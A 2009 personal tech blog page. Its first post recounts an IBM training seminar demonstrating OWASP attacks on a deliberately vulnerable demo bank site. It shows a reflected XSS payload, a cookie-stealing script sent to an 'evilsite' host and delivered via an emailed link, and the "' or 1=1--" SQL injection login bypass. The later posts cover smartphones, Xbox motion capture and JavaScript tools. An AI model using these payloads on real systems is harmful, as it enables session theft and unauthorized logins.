Thursday, June 11, 2009

Web application security flaws exposed

Today I participated in the "Hacking 101" event hosted by IBM in Miami. It was a half day seminar, hands-on lab. Very interesting and useful I must admit. They talked about what are the top security issues of web applications today based on the OWASP Top 10 document. The interesting part is that they actually demonstrated some of the security issues discussed. In order to showcase everything, they have a test (fictive) web site set up, namely http://www.testfire.net/ (you can access it from your own station at will). Let me go through some vulnerabilities covered during the session.


Cross-Site Scripting (XSS) - Number 1 in the Top 10 list.

XSS is basically script embedded into HTML returned from a trusted site. One of the implications is that session tokens can be stolen. Let's see how:

First I search for the string 'Mihai', which will change the browser URL to http://www.testfire.net/search.aspx?txtSearch=mihai, printing the result like shown below:



Next step is to change the query string to http://www.testfire.net/search.aspx?txtSearch=<script>alert(document.cookie)</script>, resulting in information related to your session being made available:


So the cookie is available to JavaScript. How do we exploit this? First, you need the Tamper Data Mozilla add-on. Once you have it installed, open in by choosing Tools -> Tamper Data. Going back to Firefox, in the search text box enter %3Cscript%3Edocument.write('. Looking into the Tamper Data UI, you can locate the request just made to evilsite, and see that your cookie has been sent to it.


To exploit this vulnerability, one can send an email to the user with a link that has the above script embedded in it. Once the user clicks on it, the request will be sent to www.testfire.net, with the script as input for the search text box. When the script is echoed back to the application, it will be executed by the browser and the user cookies will be sent to evilsite.


SQL Injection - Number 2 in Top 10 list.

With SQL Injection, the user input is directly embedded into a SQL statement. One of the implications is that we can access data in a database. Let's say we wanted to log in as administrators into our dummy web site. First step is to get a sense of how the SQL statement is formed. For that, we enter a ' as the user name, followed by anything as password:


The result of trying to log in will be an error page that will display information related to how the SQL statement involving the user name and password is constructed:


Once we know how the query looks like, we can write in the user name field the text ' or 1=1--:


with the results of being signed in as admin:



Of course, IBM has a tool called AppScan that can help in detect all the vulnerabilities I mentioned in this blog. How it works, in a nutshell, is by scaning your web application (i.e. website), identifying the security issues based on some test policies, pointing out the problems , logging the issues, and recommending fixes. Below is a screenshot of AppScan in action (taken from the pdf presentation slides):


If you want to find out more about the event, get the slides, try everything out, go to http://www.ibm.com/developerworks/offers/techbriefings/details/hacking.html.

All in all, a very informative session!

Friday, June 5, 2009

Top 5 smartphones for Q1 2009

I was writing in one of my may posts about top most popular handsets in the U.S. at the end of 2008, new data come out (I read about it via cenriqueortiz) regarding top 5 smartphones sold in Q1 of 2009:
1. BlackBerry Curve
2. Apple iPhone 3G
3. BlackBerry Storm
4. BlackBerry Pearl
5. T-Mobile G1

Am glad to see the G1 up there. By the end of 2009, I predict it will move up to 4th or 3rd place.

Tuesday, June 2, 2009

And the winner is ... Xbox 360

If you haven't heard about "Project Natal" don't feel bad, you have now! It is a body motion capture for the Xbox 360. There is no controller required (direct shot at Wii), by using a 'box' that can capture motion, sound, 3D movement for multiple users during a one game session, and offers facial recognition used for example for signing you in to Xbox Live. The release date, although not officially released, it is expected to be some time later this year (Christmas maybe?). I am curious about the cost of Natal. We should not forget that the Wii has a lower price compared to the Xbox 360 and PS3. I guess we'll find out sooner or later.

All the tools you need to work with JavaScript

There is a JavaWorld article titled Ajax: Tools of the trade, which consists of a survey of tools for the JavaScript developer.

The article starts by mentioning the JavaScript support offered by popular IDEs such as NetBeans, IntelliJ, and Eclipse. It continues with describing tools such as Firebug (lets you edit, debug, and monitor JavaScript on the fly), YSlow (analysis webpages and suggests ways to imporve performance), and Hammerhead (measures the load time of web pages).

The next part of the article goes into ways of testing your JavaScript code, by using tools and frameworks such as JsUnit (unit testing framework for JavaScript), JSSpec (you have one or more tests that describe the behavior), YUI Test (testing framework for JavaScript), and Crosscheck (checks if your code runs in many different browsers).

If you are interested in testing your user interface, the article mentions some of the tools available, such as Selenium (set of tools that supports rapid development of test automation for web-based applications), Watir (an open-source library for automating web browsers), and YUI Test mentioned above which can also be used to simulate the DOM and user interaction.

Other utility tools for JavaScript include JSLint (JavaScript code quality tool), or JSMin ( removes comments and unnecessary whitespace from JavaScript files) and YUI Compressor (in addition to removing comments and whitespace, it also obfuscates local variables using the smallest possible variable name), for minimizing our JavaScript.

Since I have just started JavaScript, I cannot make any recommendations. Try them out, see which one fits your project best, and use it.